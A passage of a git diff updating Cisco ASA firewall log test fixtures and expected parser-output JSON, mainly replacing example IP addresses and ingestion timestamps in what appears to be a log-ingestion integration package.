All IPSec SA proposals found unacceptable! Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable! -Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.128.1.1, All IPSec SA proposals found unacceptable! +Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.168.1.1, All IPSec SA proposals found unacceptable! Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable! -Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable! +Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable! diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json index d0924ccae9e..6e288f1f5ac 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json @@ -6,7 +6,7 @@ }, "destination": { "nat": { - "ip": "8.8.5.4" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 53500, @@ -14,7 +14,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 53500, @@ -54,9 +54,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.8", - "192.168.2.2", - "8.8.5.4" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -64,8 +63,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.554978200Z", - "original": "May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)", + "ingested": "2021-12-09T13:33:30.615291700Z", + "original": "May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -80,8 +79,8 @@ "asa": { "destination_interface": "fw111", "mapped_source_port": 53500, - "mapped_destination_ip": "8.8.5.4", - "mapped_source_ip": "8.8.8.8", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "111111111", "source_interface": "net", "mapped_destination_port": 53500 @@ -94,7 +93,7 @@ }, "destination": { "nat": { - "ip": "8.8.5.4" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 53500, @@ -102,7 +101,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 53500, @@ -142,9 +141,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.8", - "192.168.2.2", - "8.8.5.4" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -152,8 +150,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.554989100Z", - "original": "May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)", + "ingested": "2021-12-09T13:33:30.615295400Z", + "original": "May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -168,8 +166,8 @@ "asa": { "destination_interface": "fw111", "mapped_source_port": 53500, - "mapped_destination_ip": "8.8.5.4", - "mapped_source_ip": "8.8.8.8", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "111111111", "source_interface": "net", "mapped_destination_port": 53500 @@ -186,7 +184,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "ip": "192.168.2.2" @@ -214,7 +212,7 @@ ], "ip": [ "192.168.2.2", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -223,8 +221,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555012900Z", - "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3", + "ingested": "2021-12-09T13:33:30.615300100Z", + "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", "action": "flow-expiration", @@ -238,7 +236,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8", + "mapped_source_ip": "81.2.69.144", "icmp_type": 3, "icmp_code": 3 } @@ -284,7 +282,7 @@ "event": { "severity": 7, "duration": 0, - "ingested": "2021-10-11T11:44:17.555020700Z", + "ingested": "2021-12-09T13:33:30.615304900Z", "original": "May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00", "code": "609002", "kind": "event", @@ -344,7 +342,7 @@ }, "event": { "severity": 7, - "ingested": "2021-10-11T11:44:17.555024900Z", + "ingested": "2021-12-09T13:33:30.615308900Z", "original": "May 5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2", "code": "609001", "kind": "event", @@ -373,7 +371,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "ip": "192.168.2.2" @@ -401,7 +399,7 @@ ], "ip": [ "192.168.2.2", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -410,8 +408,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555028700Z", - "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 1", + "ingested": "2021-12-09T13:33:30.615312700Z", + "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 1", "code": "302020", "kind": "event", "action": "flow-expiration", @@ -425,7 +423,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8", + "mapped_source_ip": "81.2.69.144", "icmp_type": 3, "icmp_code": 1 } @@ -437,7 +435,7 @@ }, "destination": { "nat": { - "ip": "8.8.5.4" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 111, @@ -445,7 +443,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 111, @@ -483,9 +481,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.8", - "192.168.2.2", - "8.8.5.4" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -493,8 +490,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555034100Z", - "original": "May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (8.8.8.8/111) to fw111:192.168.2.2/111 (8.8.5.4/111)", + "ingested": "2021-12-09T13:33:30.615317400Z", + "original": "May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (81.2.69.144/111) to fw111:192.168.2.2/111 (81.2.69.144/111)", "code": "805001", "kind": "event", "action": "firewall-rule", @@ -509,8 +506,8 @@ "asa": { "destination_interface": "fw111", "mapped_source_port": 111, - "mapped_destination_ip": "8.8.5.4", - "mapped_source_ip": "8.8.8.8", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "111111111", "source_interface": "fw111", "mapped_destination_port": 111 @@ -572,7 +569,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555040600Z", + "ingested": "2021-12-09T13:33:30.615321Z", "original": "May 5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443)", "code": "805002", "kind": "event", @@ -646,7 +643,7 @@ }, "event": { "severity": 7, - "ingested": "2021-10-11T11:44:17.555047Z", + "ingested": "2021-12-09T13:33:30.615326500Z", "original": "May 5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 192.168.2.2/68 to fw111:10.10.10.10/67", "code": "710005", "kind": "event", @@ -728,7 +725,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555051200Z", + "ingested": "2021-12-09T13:33:30.615332400Z", "original": "May 5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log", "code": "303002", "kind": "event", @@ -771,7 +768,7 @@ }, "event": { "severity": 7, - "ingested": "2021-10-11T11:44:17.555089800Z", + "ingested": "2021-12-09T13:33:30.615337300Z", "original": "May 5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4", "code": "710006", "kind": "event", @@ -826,8 +823,8 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:44:17.555096600Z", - "original": "May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 8.8.8.8/10872.", + "ingested": "2021-12-09T13:33:30.615341400Z", + "original": "May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 81.2.69.144/10872.", "code": "313005", "kind": "event", "action": "firewall-rule", @@ -854,7 +851,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "ip": "10.10.10.10" @@ -882,7 +879,7 @@ ], "ip": [ "10.10.10.10", - "8.8.8.8", + "81.2.69.144", "192.168.2.2" ] }, @@ -891,8 +888,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555102900Z", - "original": "May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 8.8.8.8/2 laddr 10.10.10.10/2 type 8 code 0", + "ingested": "2021-12-09T13:33:30.615346400Z", + "original": "May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 81.2.69.144/2 laddr 10.10.10.10/2 type 8 code 0", "code": "302021", "kind": "event", "action": "flow-expiration", @@ -906,7 +903,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8", + "mapped_source_ip": "81.2.69.144", "icmp_type": 8, "icmp_code": 0 } @@ -951,7 +948,7 @@ }, "event": { "severity": 7, - "ingested": "2021-10-11T11:44:17.555108500Z", + "ingested": "2021-12-09T13:33:30.615366600Z", "original": "May 5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10", "code": "609001", "kind": "event", @@ -1010,7 +1007,7 @@ "event": { "severity": 7, "duration": 0, - "ingested": "2021-10-11T11:44:17.555114Z", + "ingested": "2021-12-09T13:33:30.615371800Z", "original": "May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00", "code": "609002", "kind": "event", @@ -1041,7 +1038,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.192.46.90", "ip": "10.192.46.90" @@ -1069,7 +1066,7 @@ ], "ip": [ "10.192.46.90", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1078,8 +1075,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555121800Z", - "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 10.192.46.90/0", + "ingested": "2021-12-09T13:33:30.615376200Z", + "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 10.192.46.90/0", "code": "302020", "kind": "event", "action": "flow-expiration", @@ -1093,7 +1090,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8" + "mapped_source_ip": "81.2.69.144" } } }, @@ -1107,7 +1104,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "ip": "192.168.2.2" @@ -1135,7 +1132,7 @@ ], "ip": [ "192.168.2.2", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1144,8 +1141,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555129600Z", - "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3", + "ingested": "2021-12-09T13:33:30.615380200Z", + "original": "May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", "action": "flow-expiration", @@ -1159,7 +1156,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8", + "mapped_source_ip": "81.2.69.144", "icmp_type": 3, "icmp_code": 3 } @@ -1223,7 +1220,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-10-11T11:44:17.555137100Z", + "ingested": "2021-12-09T13:33:30.615384900Z", "original": "May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I", "code": "302014", "kind": "event", @@ -1252,7 +1249,7 @@ }, "destination": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 54839, @@ -1260,7 +1257,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 80, @@ -1300,7 +1297,7 @@ ], "ip": [ "192.168.2.2", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -1309,8 +1306,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555144600Z", - "original": "May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (8.8.8.8/80) to net:10.10.10.10/54839 (8.8.8.8/54839)", + "ingested": "2021-12-09T13:33:30.615389300Z", + "original": "May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (81.2.69.144/80) to net:10.10.10.10/54839 (81.2.69.144/54839)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -1325,8 +1322,8 @@ "asa": { "destination_interface": "net", "mapped_source_port": 80, - "mapped_destination_ip": "8.8.8.8", - "mapped_source_ip": "8.8.8.8", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "1588662", "source_interface": "intfacename", "mapped_destination_port": 54839 @@ -1389,7 +1386,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-10-11T11:44:17.555152100Z", + "ingested": "2021-12-09T13:33:30.615393400Z", "original": "May 5 18:29:32 dev01: %ASA-6-302012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00", "code": "302012", "kind": "event", @@ -1459,7 +1456,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:44:17.555159600Z", + "ingested": "2021-12-09T13:33:30.615397100Z", "original": "May 5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session", "code": "313004", "kind": "event", @@ -1535,7 +1532,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555167200Z", + "ingested": "2021-12-09T13:33:30.615401300Z", "original": "May 5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006", "code": "305011", "kind": "event", @@ -1605,7 +1602,7 @@ }, "event": { "severity": 2, - "ingested": "2021-10-11T11:44:17.555174900Z", + "ingested": "2021-12-09T13:33:30.615404900Z", "original": "May 5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN on interface out111", "code": "106001", "kind": "event", @@ -1630,27 +1627,9 @@ "level": "critical" }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Thousand Oaks", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", - "location": { - "lon": -118.8199, - "lat": 34.197 - } - }, - "as": { - "number": 395776, - "organization": { - "name": "FEDERAL ONLINE GROUP LLC" - } - }, - "address": "192.186.2.2", "port": 53356, - "ip": "192.186.2.2" + "address": "1192.168.2.2", + "domain": "1192.168.2.2" }, "source": { "port": 161, @@ -1687,11 +1666,11 @@ }, "related": { "hosts": [ - "dev01" + "dev01", + "1192.168.2.2" ], "ip": [ - "10.10.10.10", - "192.186.2.2" + "10.10.10.10" ] }, "host": { @@ -1700,8 +1679,8 @@ "event": { "severity": 2, "duration": 124000000000, - "ingested": "2021-10-11T11:44:17.555182800Z", - "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:192.186.2.2/53356 duration 0:02:04 bytes 64585", + "ingested": "2021-12-09T13:33:30.615409Z", + "original": "May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585", "code": "302016", "kind": "event", "start": "2021-05-05T18:38:46.000Z", @@ -1729,7 +1708,7 @@ }, "destination": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 22638, @@ -1737,7 +1716,7 @@ }, "source": { "nat": { - "ip": "8.8.8.4" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 161, @@ -1777,9 +1756,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.4", - "192.168.2.2", - "8.8.8.8" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -1787,8 +1765,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-11T11:44:17.555187800Z", - "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)", + "ingested": "2021-12-09T13:33:30.615413600Z", + "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1803,8 +1781,8 @@ "asa": { "destination_interface": "net", "mapped_source_port": 161, - "mapped_destination_ip": "8.8.8.8", - "mapped_source_ip": "8.8.8.4", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "1743372", "source_interface": "intfacename", "mapped_destination_port": 22638 @@ -1817,7 +1795,7 @@ }, "destination": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 22638, @@ -1825,7 +1803,7 @@ }, "source": { "nat": { - "ip": "8.8.8.4" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 161, @@ -1865,9 +1843,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.4", - "192.168.2.2", - "8.8.8.8" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -1875,8 +1852,8 @@ }, "event": { "severity": 2, - "ingested": "2021-10-11T11:44:17.555193600Z", - "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638)", + "ingested": "2021-12-09T13:33:30.615418900Z", + "original": "May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -1891,8 +1868,8 @@ "asa": { "destination_interface": "net", "mapped_source_port": 161, - "mapped_destination_ip": "8.8.8.8", - "mapped_source_ip": "8.8.8.4", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "1743372", "source_interface": "intfacename", "mapped_destination_port": 22638 @@ -1954,7 +1931,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:44:17.555200300Z", + "ingested": "2021-12-09T13:33:30.615423800Z", "original": "May 5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group \"out1111_access_out\" [0x47e21ef4, 0x47e21ef4]", "code": "106023", "kind": "event", @@ -2024,7 +2001,7 @@ }, "event": { "severity": 4, - "ingested": "2021-10-11T11:44:17.555206900Z", + "ingested": "2021-12-09T13:33:30.615429400Z", "original": "May 5 18:40:50 dev01: %ASA-4-106021: Deny TCP reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111", "code": "106021", "kind": "event", @@ -2095,7 +2072,7 @@ }, "event": { "severity": 2, - "ingested": "2021-10-11T11:44:17.555214800Z", + "ingested": "2021-12-09T13:33:30.615435100Z", "original": "May 5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111", "code": "106006", "kind": "event", @@ -2165,7 +2142,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555219200Z", + "ingested": "2021-12-09T13:33:30.615440700Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK on interface out111", "code": "106015", "kind": "event", @@ -2235,7 +2212,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555224800Z", + "ingested": "2021-12-09T13:33:30.615446300Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK on interface out111", "code": "106015", "kind": "event", @@ -2305,7 +2282,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555232700Z", + "ingested": "2021-12-09T13:33:30.615469500Z", "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST on interface fw111", "code": "106015", "kind": "event", @@ -2380,8 +2357,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555237500Z", - "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "ingested": "2021-12-09T13:33:30.615475600Z", + "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", "action": "firewall-rule", @@ -2454,8 +2431,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555242100Z", - "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "ingested": "2021-12-09T13:33:30.615479800Z", + "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", "action": "firewall-rule", @@ -2528,8 +2505,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555245800Z", - "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)", + "ingested": "2021-12-09T13:33:30.615484Z", + "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", "action": "firewall-rule", @@ -2605,7 +2582,7 @@ "severity": 6, "duration": 0, "reason": "Cluster flow with CLU closed on owner", - "ingested": "2021-10-11T11:44:17.555251200Z", + "ingested": "2021-12-09T13:33:30.615488100Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner", "code": "302023", "kind": "event", @@ -2684,7 +2661,7 @@ "severity": 6, "duration": 0, "reason": "Forwarding or redirect flow removed to create director or backup flow", - "ingested": "2021-10-11T11:44:17.555257500Z", + "ingested": "2021-12-09T13:33:30.615492300Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow", "code": "302023", "kind": "event", @@ -2735,7 +2712,7 @@ }, "event": { "severity": 7, - "ingested": "2021-10-11T11:44:17.555264100Z", + "ingested": "2021-12-09T13:33:30.615496100Z", "original": "May 5 19:03:27 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief", "code": "111009", "kind": "event", @@ -2786,7 +2763,7 @@ }, "event": { "severity": 7, - "ingested": "2021-10-11T11:44:17.555271900Z", + "ingested": "2021-12-09T13:33:30.615499900Z", "original": "May 5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list aaa_out brief", "code": "111009", "kind": "event", @@ -2862,7 +2839,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555279500Z", + "ingested": "2021-12-09T13:33:30.615503800Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -\u003e fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", @@ -2939,7 +2916,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555287200Z", + "ingested": "2021-12-09T13:33:30.615508400Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -\u003e fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", @@ -2985,7 +2962,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555294700Z", + "ingested": "2021-12-09T13:33:30.615512600Z", "original": "May 5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner", "code": "302027", "kind": "event", @@ -3028,8 +3005,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555302200Z", - "original": "May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (8.8.8.8)", + "ingested": "2021-12-09T13:33:30.615517800Z", + "original": "May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (81.2.69.144)", "code": "302026", "kind": "event", "action": "firewall-rule", @@ -3097,7 +3074,7 @@ }, "event": { "severity": 7, - "ingested": "2021-10-11T11:44:17.555309700Z", + "ingested": "2021-12-09T13:33:30.615522100Z", "original": "May 5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985", "code": "710005", "kind": "event", @@ -3141,7 +3118,7 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555317400Z", + "ingested": "2021-12-09T13:33:30.615526400Z", "original": "May 5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout", "code": "302025", "kind": "event", @@ -3184,8 +3161,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555324900Z", - "original": "May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (8.8.8.8/123)", + "ingested": "2021-12-09T13:33:30.615531Z", + "original": "May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (81.2.69.144/123)", "code": "302024", "kind": "event", "action": "firewall-rule", @@ -3256,7 +3233,7 @@ }, "event": { "severity": 3, - "ingested": "2021-10-11T11:44:17.555332500Z", + "ingested": 